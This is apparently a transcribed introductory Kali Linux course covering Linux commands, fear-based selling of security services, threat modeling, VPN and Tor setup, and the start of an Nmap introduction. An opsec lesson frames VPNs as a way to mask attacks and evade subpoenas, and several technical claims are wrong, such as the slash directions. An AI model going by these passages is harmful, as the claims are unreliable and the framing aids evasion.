Lesson 1: Introduction to Kali Linux

Transcription

Lesson 1: Introduction to Kali Linux
Lesson 1: Introduction to Kali Linux
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It
is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux
distribution.
Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner),
Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for
penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security
scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a
live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit
Project’s Metasploit Framework, a tool for developing and executing security exploits.
Introduction to Kali Linux
:From kali website:
Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.
Kali Linux Features
Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards.
All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our
VCS.
More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we
eliminated a great number of tools that either did not work or had other tools available that provided
similar functionality.
Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will
never, ever have to pay for Kali Linux.
Open source Git tree: We are huge proponents of open source software and our development tree is
available for all to see and all sources are available for those who wish to tweak and rebuild packages.
FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all
Linux users to easily locate binaries, support files, libraries, etc.
Vast wireless device support: We have built Kali Linux to support as many wireless devices as we
possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with
numerous USB and other wireless devices.
Custom kernel patched for injection: As penetration testers, the development team often needs to do
wireless assessments so our kernel has the latest injection patches included.
Secure development environment: The Kali Linux team is made up of a small group of trusted individuals
who can only commit packages and interact with the repositories while using multiple secure protocols.
GPG signed packages and repos: All Kali packages are signed by each individual developer when they
are built and committed and the repositories subsequently sign the packages as well.
Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has
true multilingual support, allowing more users to operate in their native language and locate the tools they
need for the job.
Completely customizable:
ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and
inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting
in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories
integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of
the distribution. Kali is currently available for the following ARM devices:
- rk3306 mk/ss808
- Raspberry Pi
- ODROID U2/X2
- Samsung Chromebook
- EfikaMX
- Beaglebone Black
- CuBox
- Galaxy Note 10.1
..................
Okay class, its important to realize that most of the commands in kali are GUI or graphic user interface
unlike previous installations of backtrack which require terminal input.
Terminal is like windows command prompt, with a derivative you will be quick to notice, in file paths in
windows the slash is forwards
\
In the linux enviroment, the slash is backwards
/
***Important***
Filepaths are case sensitive and when launching a program you also have to type the extension.
Ex. Root/user/admin/torhammer.py
If you had the above program installed, the extension being ".py" would launch the program.
Another cool thing about kali, and linux period, is if and when you learn a programming language, you
can code your own programs in their "notepad" style program and save it as something like
"hacklikeaboss.py" and it will save as a python file, then right click and change advanced settings to
executable file andddddd voila! Your very own custom program has been created.
Enough about kali, im sure youre ready to get started on lesson 2
Lesson 2 : Real World applications for kali, forming your own business, and introduction to terminal, the
hacker's best friend.
Lesson 2: Real World Applications for Kali Linux
Greetings class:
Real world applications for Kali Linux are very diverse. Incorperating them into your repertoire as a sales pitch
is crucial to forming a thriving business model that will generate revenue for you and your company.
Small business examples:
Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work
from home. These are businesses that you will start with at first to build a reputation.
Stressing the importance of Data Security to the customer is an integral part of the sales pitch. Looking up
articles about local businesses around your area, and even college databases being breached can not only
raise awareness, but also raise the fear factor. Ever heard the term a little fear is healthy? Well fear sells, and
in todays day and age everyone is digital.
Some people run their business sites via wordpress, even blog on them daily about events. This consumes a
good portion of time for the client, and if someone were to access that because they had a faulty line of code in
their site, they could not only lose their investment, but lose customers and customer data as well.
A Kali Linux application for this would be a tool called wpscan, which we will review later on, but it scans the
site for vulnerabilities allowing you to report them to the sitemaster or admin.
Its illegal to scan without permission, always get permission.
Another tool to use would be nmap
This tool scans open ports on wifi connections
Open ports are like open doors that anyone with the right knowledge can access, and access things like
customer data, and even credit card transaction information.
You will find when launching these programs via the drop down menu that they launch a sort of command
prompt via a program called terminal. Kali is already preconfigured to run root access, so a tutorial in sudo isnt
necessary.
Terminal accepts your commands and runs basically every function on kali and this is where you will spend
most of your time.
Everytime you start kali, if its a live disk and not a full install, i recommend opening up a terminal first thing
Then type
apt-get update
This updates the files
You can also search for upgraded software
apt-get upgrade
Other commands are listed below
System Info
date – Show the current date and time
cal – Show this month's calendar
uptime – Show current uptime
w – Display who is online
whoami – Who you are logged in as
finger user – Display information about user
uname -a – Show kernel information
cat /proc/cpuinfo – CPU information
cat /proc/meminfo – Memory information
df -h – Show disk usage
du – Show directory space usage
free – Show memory and swap usage
Keyboard Shortcuts
Enter – Run the command
Up Arrow – Show the previous command
Ctrl + R – Allows you to type a part of the command you're looking for and finds it
Ctrl + Z – Stops the current command, resume with fg in the foreground or bg in the background
Ctrl + C – Halts the current command, cancel the current operation and/or start with a fresh new line
Ctrl + L – Clear the screen
command | less – Allows the scrolling of the bash command window using Shift + Up Arrowand Shift +
Down Arrow
!! – Repeats the last command
command !$ – Repeats the last argument of the previous command
Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it
before executing the command
Ctrl + A – Return to the start of the command you're typing
Ctrl + E – Go to the end of the command you're typing
Ctrl + U – Cut everything before the cursor to a special clipboard, erases the whole line
Ctrl + K – Cut everything after the cursor to a special clipboard
Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to
Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from
the left to the right, try it!)
Ctrl + W – Delete the word / argument left of the cursor in the current line
Ctrl + D – Log out of current session, similar to exit
Learn the Commands
apropos subject – List manual pages for subject
man -k keyword – Display man pages containing keyword
man command – Show the manual for command
man -t man | ps2pdf - > man.pdf – Make a pdf of a manual page
which command – Show full path name of command
time command – See how long a command takes
whereis app – Show possible locations of app
which app – Show which app will be run by default; it shows the full path
Searching
grep pattern files – Search for pattern in files
grep -r pattern dir – Search recursively for pattern in dir
command | grep pattern – Search for pattern in the output of command
locate file – Find all instances of file
find / -name filename – Starting with the root directory, look for the file called filename
find / -name ”*filename*” – Starting with the root directory, look for the file containing the string filename
locate filename – Find a file called filename using the locate command; this assumes you have already used
the command updatedb (see next)
updatedb – Create or update the database of files on all file systems attached to the Linux root directory
which filename – Show the subdirectory containing the executable file called filename
grep TextStringToFind /dir – Starting with the directory called dir, look for and list all files
containing TextStringToFind
File Permissions
chmod octal file – Change the permissions of file to octal, which can be found separately for user, group,
and world by adding: 4 – read (r),2 – write (w), 1 – execute (x)
Examples:
chmod 777 – read, write, execute for all
chmod 755 – rwx for owner, rx for group and world
For more options, see man chmod.
File Commands
ls – Directory listing
ls -l – List files in current directory using long format
ls -laC – List all files in current directory in long format and display in columns
ls -F – List files in current directory and indicate the file type
ls -al – Formatted listing with hidden files
cd dir – Change directory to dir
cd – Change to home
mkdir dir – Create a directory dir
pwd – Show current directory
rm name – Remove a file or directory called name
rm -r dir – Delete directory dir
rm -f file – Force remove file
rm -rf dir – Force remove an entire directory dir and all it’s included files and subdirectories (use with extreme
caution)
cp file1 file2 – Copy file1 to file2
cp -r dir1 dir2 – Copy dir1 to dir2; create dir2 if it doesn't exist
cp file /home/dirname – Copy the filename called file to the /home/dirname directory
mv file /home/dirname – Move the file called filename to the /home/dirname directory
mv file1 file2 – Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2
ln -s file link – Create symbolic link link to file
touch file – Create or update file
cat > file – Places standard input into file
cat file – Display the file called file
more file – Display the file called file one page at a time, proceed to next page using the spacebar
head file – Output the first 10 lines of file
head -20 file – Display the first 20 lines of the file called file
tail file – Output the last 10 lines of file
tail -20 file – Display the last 20 lines of the file called file
tail -f file – Output the contents of file as it grows, starting with the last 10 lines
Compression
tar cf file.tar files – Create a tar named file.tar containing files
tar xf file.tar – Extract the files from file.tar
tar czf file.tar.gz files – Create a tar with Gzip compression
tar xzf file.tar.gz – Extract a tar using Gzip
tar cjf file.tar.bz2 – Create a tar with Bzip2 compression
tar xjf file.tar.bz2 – Extract a tar using Bzip2
gzip file – Compresses file and renames it to file.gz
gzip -d file.gz – Decompresses file.gz back to file
Printing
/etc/rc.d/init.d/lpd start – Start the print daemon
/etc/rc.d/init.d/lpd stop – Stop the print daemon
/etc/rc.d/init.d/lpd status – Display status of the print daemon
lpq – Display jobs in print queue
lprm – Remove jobs from queue
lpr – Print a file
lpc – Printer control tool
man subject | lpr – Print the manual page called subject as plain text
man -t subject | lpr – Print the manual page called subject as Postscript output
printtool – Start X printer setup interface
Network
ifconfig – List IP addresses for all devices on the local machine
iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for
example: the frequency)
iwlist – used to display some additional information from a wireless network interface that is not displayed
by iwconfig
ping host – Ping host and output results
whois domain – Get whois information for domain
dig domain – Get DNS information for domain
dig -x host – Reverse lookup host
wget file – Download file
wget -c file – Continue a stopped download
SSH
ssh user@host – Connect to host as user
ssh -p port user@host – Connect to host on port port as user
ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login
User Administration
adduser accountname – Create a new user call accountname
passwd accountname – Give accountname a new password
su – Log in as superuser from current login
exit – Stop being superuser and revert to normal user
Process Management
ps – Display your currently active processes
top – Display all running processes
kill pid – Kill process id pid
killall proc – Kill all processes named proc (use with extreme caution)
bg – Lists stopped or background jobs; resume a stopped job in the background
fg – Brings the most recent job to foreground
fg n – Brings job n to the foreground
Installation from source
./configure
make
make install
dpkg -i pkg.deb – install a DEB package (Debian / Ubuntu / Linux Mint)
rpm -Uvh pkg.rpm – install a RPM package (Red Hat / Fedora)
Stopping & Starting
shutdown -h now – Shutdown the system now and do not reboot
halt – Stop all processes - same as above
shutdown -r 5 – Shutdown the system in 5 minutes and reboot
shutdown -r now – Shutdown the system now and reboot
reboot – Stop all processes and then reboot - same as above
startx – Start the X system
Lesson 3: Threat assessment and how to sell it
Good morning class,
I hope you have had time to experiment with terminal commands and familiarize yourelves with the file
structure of Kali Linux.
Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this
fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson
will be on threat assessment.
Now for a little roleplay.
Company xyz is a fortune 500 company, who buys and trades domains on the market, processing credit cars
and bank transactions, storing customer information on encrypted servers, and has an option for member sign
up. You ask them and they say they are running sql databases.
How would you approach the company to sell your business?
Respond to this email with your answer.
My answer will be included in lesson 4
Now on threat assessment,
Modeling
There is no single solution for keeping yourself safe online. Digital security isn’t about which tools you use;
rather, it’s about understanding the threats you face and how you can counter those threats. To become more
secure, you must determine what you need to protect, and whom you need to protect it from. Threats can
change depending on where you’re located, what you’re doing, and whom you’re working with. Therefore, in
order to determine what solutions will be best for you, you should conduct a threat modeling assessment.
When conducting an assessment, there are five main questions you should ask yourself:
What do you want to protect?Who do you want to protect it from?How likely is it that you will need to protect
it?How bad are the consequences if you fail?How much trouble are you willing to go through in order to try to
prevent those?
When we talk about the first question, we often refer to assets, or the things that you are trying to protect.
An assett is something you value and want to protect. When we are talking about digital security, the assets in
question are usually information. For example, your emails, contact lists, instant messages, and files are all
assets. Your devices are also assets.
Write down a list of data that you keep, where it’s kept, who has access to it, and what stops others
from accessing it.
In order to answer the second question, “Who do you want to protect it from,” it’s important to understand who
might want to target you or your information, or who is your adversary. An adversary is any person or entity that
poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government,
or a hacker on a public network.
Make a list of who might want to get ahold of your data or communications. It might be an individual, a
government agency, or a corporation.
A threat is something bad that can happen to an asset. There are numerous ways that an adversary can
threaten your data. For example, an adversary can read your private communications as they pass through the
network, or they can delete or corrupt your data. An adversary could also disable your access to your own data.
The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a
video showing police violence may be content to simply delete or reduce the availability of that video, whereas
a political opponent may wish to gain access to secret content and publish it without you knowing.
Write down what your adversary might want to do with your private data.
The capability of your attacker is also an important thing to think about. For example, your mobile phone
provider has access to all of your phone records and therefore has the capability to use that data against you.
A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might
have stronger capabilities.
A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will
actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to
access all of your data, the risk of them posting your private data online to harm your reputation is low.
It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the
likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk
of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where
they are not).
Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or
views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because
the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high
risks because they don't view the threat as a problem.
In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into
enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to
be available than confidential.
Now, let’s practice threat modeling.
If you want to keep your house and possessions safe, here are a few questions you might ask:
Should I lock my door?What kind of lock or locks should I invest in?Do I need a more advanced security
system?What are the assets in this scenario?The privacy of my homeThe items inside my homeWhat is the
threat?Someone could break in.What is the actual risk of someone breaking in? Is it likely?
Once you have asked yourself these questions, you are in a position to assess what measures to take. If your
possessions are valuable, but the risk of a break-in is low, then you probably won’t want to invest too much
money in a lock. On the other hand, if the risk is high, you’ll want to get the best locks on the market, and
perhaps even add a security system.
Lesson 4: Opsec, VPN, Tor.
Opsec stands for "operational security" and is a term coined by the special forces in the United States military.
When it comes to hacking, Opsec is essential as to not let your opponent know that you are on to them. If you
are hired to test the security already in place, it would be obvious that you would need to learn ways to mask
your attacks.
Virtual Private Networks or VPNs:
What Is A VPN?
A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the
Internet) to a remote network/location. This remote network is typically a private network, such as a workplace
or home network, or one provided by a commercial VPN service.
A VPN can be thought to create a "tunnel" through the public network to your private network at the other end.
All network traffic through this tunnel is encrypted to ensure it is kept secure and private.
What Does A VPN Let Me Do?
A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard
network. This includes:
Network Security & Privacy: All network traffic through your VPN connection is kept secure. This allows you
to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your
network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network
traffic, such as see what you are viewing, steal your information and login details, etc.
Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you
were physically in the office. You can then do things like access file servers, computers, databases, email,
internal webpages, and other services you might not have access to outside of your work network.
Access Your Home Network: Connecting back home using a VPN allows you to access your computers
remotely. Access files on your computer, view iTunes shares, take remote control of your computer, and
access other services.
Access Location Restricted Content: By connecting to a VPN server in another location you can make it
appear to websites using geolocation that you are physically in the correct location for access. So when you're
travelling overseas you can still view websites you would normally use at home, such as television, movie and
music streaming websites.
Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed,
meaning that many applications like VOIP, instant messenging, video chat, and games will not work. However
using a VPN you can tunnel through such restrictions and allow all of your network applications to work.
Viscosity even allows you to tunnel through a HTTP or SOCKS proxies to establish your VPN connection.
Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that
would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a
VPN provides a way to still maintain access to the services you would normally use.
Why Should I Use A VPN?
Even if you have no desire to be able to access a private network remotely, a VPN is vital to ensure the
security and privacy of your network traffic.
Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious
users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing,
steal username and passwords, steal session information to be able to log into sites as you, and extract other
private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only
monitor in depth your network traffic, but also alter your traffic or inject their own in an attempt to fool a user into
revealing important data.
Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it
secure and private.
How Does A VPN Work?
A typical VPN consists of two components: the VPN client and the VPN server.
A VPN client is the software that allows a user to connect their computer to the VPN server and establish the
VPN connection. It is installed on the user's computer and communicates with the VPN server to create a
secure link for the user's network traffic. The VPN Client is what the end user uses to control their VPN
connection. Viscosity performs the duties of a VPN client.
A VPN server is setup at the location users want to connect to, such as at a workplace or at home. A VPN
Server usually configured and maintained by IT staff, however home users often set up their own VPN personal
VPN server at home or at a remote location as well. End users rarely have to interact with the VPN Server. A
VPN server will also perform authentication to ensure only registered users can connect to the VPN.
All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it
private and secure.
What Is OpenVPN?
OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Like IPSec and PPTP, OpenVPN
handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to
its high level of security, customizability, and compatibility with most network environments.
VPN Service Providers
There are many companies that specialize in providing a commercial VPN service. These companies are
known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing
you to not only get the security and privacy benefits on a VPN, but also making it easy to access websites that
restrict access to certain counties. Most VPN Service Providers charge a small monthly or yearly fee for access
to their servers, however there are also a number of free service providers.
The key to choosing a quality vpn comes down to two factors,
1) do they cooperate with united states gov subpoenas
2 do they keep logs (you dont want logs)
TorGuard
TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the
ability to connect to torrent-friendly services if you need to download something, encryption and anonymity-
friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service
providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN—even
if you don't use them—isn't leaking DNS and thus information you thought was secure. Depending on your
usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN
service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous
proxy or a torrent proxy. Their full VPN service however features over 200 exit servers in 18 countries, no
logging or data retention of any kind, and their network is set up in a way that they actually have no information
to collect on their user activities—they don't know what you're doing or when you're connected. They delivered
a really great response to Torrentfreak's questions that's well worth a read for more info. They also support
multiple connectivity protocols, support for virtually every desktop and mobile OS, and even offer their
customers encrypted, offshore email service if you want to take advantage.
Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN
servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt
or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies.") You
also noted that they support OpenVPN, help you get connected via your home network, and have great
customer service.
IPVanish VPN
IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they
say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're
compromising security though—they have over 14,0000 IPs to share on over a hundred exit servers in 47
different countries. You can choose where you'd prefer to connect, which again is perfect for getting around
location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X,
Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and
Android, and they offer configuration utilities so you can set you home router to connect to them as well. They
feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your
activities, and only log a few things. Torrentfreak gave them the nod as well. Accounts with IPVanish
are$10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols.)
IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage
to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while
giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that
they're happy with you streaming video or music while you're connected to get around pesky content blocks,
especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back
home or make use of their streaming music subscription.
CyberGhost VPN
CyberGhost has been around for a long time, they made a great showing in the call for contenders thread. Like
any good, trustworthy VPN provider, they both encrypt all of the data that passes through your connection and
anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the
go, you may be able to get away with a free account. The service just went through a massive overhaul about a
year ago, where they removed traffic and bandwidth restrictions for free accounts, and improved security from
the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're
connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different
countries (free users can pick from one of 14, still impressive for a free service), and you cansee server status
at any time
Their clients are easy to use, support virtually every mobile and desktop platforms, and they don't discriminate
against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to
get around their location-blocks.)
The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3
hours, and are limited to the official client, while pro accounts can use other connection protoctols and have
way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if
you need more than one device connected at any given time, you'll need to step up to Premium Plus, at
$11/mo and $70/yr. Those of you who praised the service noted their great connection speeds, wealth of
servers to choose from (even for free users). Read more in the nomination thread here.
Do-It-Yourself
Of course, no list of great options would be complete with the DIY approach. If you don't need exit servers in
different countries, and your primary need is to encrypt and secure your data when you're away from home,
you can roll yout own VPN with OpenVPN or a number of other free, open-source tools. Many of the best
routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato
firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is
that you get to set the level of encryption, you get complete control over who connects and who has access to
what parts of your home network, and where your data goes from there.
Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with
a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port
blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their
VPN running there while they connect to it when necessary. The sky's the limit with the DIY option, it just takes
the skill and knowhow to do it, and some compromise on the level of features and tools you get.
We have more than a few honorable mentions this week, including one of my personal favorites, Hideman
VPN, for their cross-platform, mobile-friendly, no-logging VPN service—complete with free VPN options for
people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are
the great people over at Tunnelbear, who are constantly working to improve and update their service to help
you get around regional restrictions and blocks—-and recently unveiled a browser add-on to tunnel some
services but not others, giving you even more control over your connection.
We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly
need. You can forward remote ports, pick and choose exit services in multiple countries, and even generate an
OpenVPN config through their wizard to connect your home network to their service all the time—oh, and they
don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking
to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to
externally, they're worth a look.
We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company
that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but
you'll sign up for Giganews when you get it. They did very well in the call for contenders thread—although
many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. They
have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the
time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least log
user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days. That's not an
issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011on the topic, cagey
with me when I last spoke to a rep from the company, andthis Reddit thread is rather illuminating as well. Still,
there are signs thatthings may be changing with VyprVPN. The feature set and the face of the company both
look good, and they combine Usenet with VPN services which is great, but we don't feel comfortable calling
them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of
your data.
A final note—something we mentioned when we talked —don't fall into the geography trap, assuming that an
overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in
your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more
trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who
asks—and there are definitely VPN providers that fall in both categories
Tor — a privacy oriented encrypted anonymizing service, has announced the launch of its next version of Tor
Browser Bundle, i.e. Tor version 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of
online users on the Internet.
Tor Browser helps users to browse the Internet in a complete anonymous way. The powerful Tor Browser
Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software.
Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’
anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and
HTTPS-Everywhere.
NEW FEATURES
The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a few number of new features:
Updated to Firefox to 31.5.0esr with important security updates.Update OpenSSL to 1.0.1lUpdate NoScript to
2.6.9.15Update HTTPS-Everywhere to 4.0.3
BUG FIXES
Meanwhile, the new Tor version 4.0.4 also include some bugfixes:Bug 14203: Prevent meek from displaying an
extra update notificationBug 14849: Remove new NoScript menu option to make permissions permanentBug
14851: Set NoScript pref to disable permanent permissions
"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from
our distribution directory," states the Tor project team.
Tor is generally thought to be a place where users come online to hide their activities and remain anonymous.
Tor is an encrypted anonymizing network considered to be one of the most privacy oriented service and is
mostly used by activists, journalists to circumvent online censorship and surveillance efforts by various
countries.
However, late last year we have seen large scale cyber attack on Tor network that quietly seized some of its
network specialized servers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays
in the anonymous network service.
On the other end of the side, last month 12 high-capacity Tor Middle relays was launched by the Polaris — a
new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build
more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps
reduce finite number of Tor connections occurring at the same time.
Installing Tor in Kali Linux:
Step 1: Getting tor service ready
There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options:
Option #1: Install Tor from Kali Repository
Tor is available in Kali repository, to install it directly from the repository open your Terminal and type this:
apt-get install tor
If no error occurs, follow the second step.
Option #2: Install Tor from Debian Wheezy Repository
If you can’t install Tor using the first method then you may try this option. In this way we are going to add the
official Tor repository according to our Debian distribution. Not to be confused, Kali is actually based on Debian
and it uses the package management from “Wheezy”. So we are going to use “Wheezy” as our distribution.
Now open your terminal and follow these steps:
Step #1: Add repo to sources.list file
Lets add the distribution in the list by opening the sources.list file
leafpad /etc/apt/sources.list
Now add the following line at the bottom of the file,
deb http://deb.torproject.org/torproject.org wheezy main
Step #2: Add GPG Keys
Now we need to add the gpg key used to sign the packages by running the following commands:
gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export
A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
Step #3: Update package lists
Lets refresh our sources:
apt-get update
Step #4: Install singing keys
Now, before installing the Tor we must add the signing key,
apt-get install deb.torproject.org-keyring
Step #5: Install Tor from Debian repository
Finally,
apt-get install tor
Now Tor should be installed!
If no error occurs, follow the second step.
Option #3: Install Tor from development branch
If you are an advanced user and you want to install Tor using the development branch then this method is for
you.
Step #1: Add Tor project repository to sources.list
You need to add a different set of lines to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org wheezy main debhttp://deb.torproject.org/torproject.org torexperimental-0.2.5.x- wheezy main
Step #2: Add GPG keys, keyring and install Tor
Then run the following commands at your command prompt:
gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export
A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - apt-get update apt-get install tor
deb.torproject.org-keyring
Now Tor should be installed!
If no error occurs, follow the second step.
Note: This release will provide you more features but it contains bugs too.
Option #4: Build and Install Tor from sources
If you want to build your own debs from source you must first add an appropriate deb-srcline to sources.list.
deb-src http://deb.torproject.org/torproject.org wheezy main debsrchttp://deb.torproject.org/torproject.org wheezy main deb-srchttp://deb.torproject.org/torproject.org torexperimental-0.2.5.x--wheezy main
You also need to install the necessary packages to build your own debs and the packages needed to build Tor:
apt-get install build-essential fakeroot devscripts apt-get build-dep tor
Then you can build Tor in ~/debian-packages:
mkdir ~/debian-packages; cd ~/debian-packages apt-get source tor cd tor-* debuild -rfakeroot -uc -us cd ..
Now you can install the new package:
dpkg -i tor_*.deb
Step #2: Downloading and Running Tor bundle
Download the Tor Bundle from here,
https://www.torproject.org/projects/torbrowser.html.en
Download the architecture-appropriate file above, save it somewhere, then run one of the following two
commands to extract the package archive:
tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz
or (for the 64-bit version):
tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz
(where LANG is the language listed in the filename).
Once that’s done, switch to the Tor browser directory by running:
cd tor-browser_LANG
(whereLANG is the language listed in the filename).
To run the Tor Browser Bundle, execute the start-tor-browser script:
./start-tor-browser
This will launch Vidalia and once that connects to Tor, it will launch Firefox.
Note: Do not unpack or run TBB as root. (though in Kali Linux, it doesn’t make any differences)
Lesson 5: Introduction to NMap
Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration, its GUI is user
friendly and boasts a wide variety of features.
Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many
systems and network administrators also find it useful for tasks such as network inventory, managing service
upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application name and version) those hosts
are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls
are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine
against single hosts. Nmap runs on all major computer operating systems, and both console and graphical
versions are available.
This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An
important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP
account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines
as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and
copyright.
Nmap Overview and Demonstration
Sometimes the best way to understand something is to see it in action. This section includes examples of
Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand
everything at once. This is simply a broad overview of features that are described in depth in later chapters.
The “solutions” included throughout this book demonstrate many other common Nmap tasks for security
auditors and network administrators.
Avatar Online
Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small
San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix
spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments
and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and
fascination since a childhood spent learning everything he could about networking, security, Unix, and phone
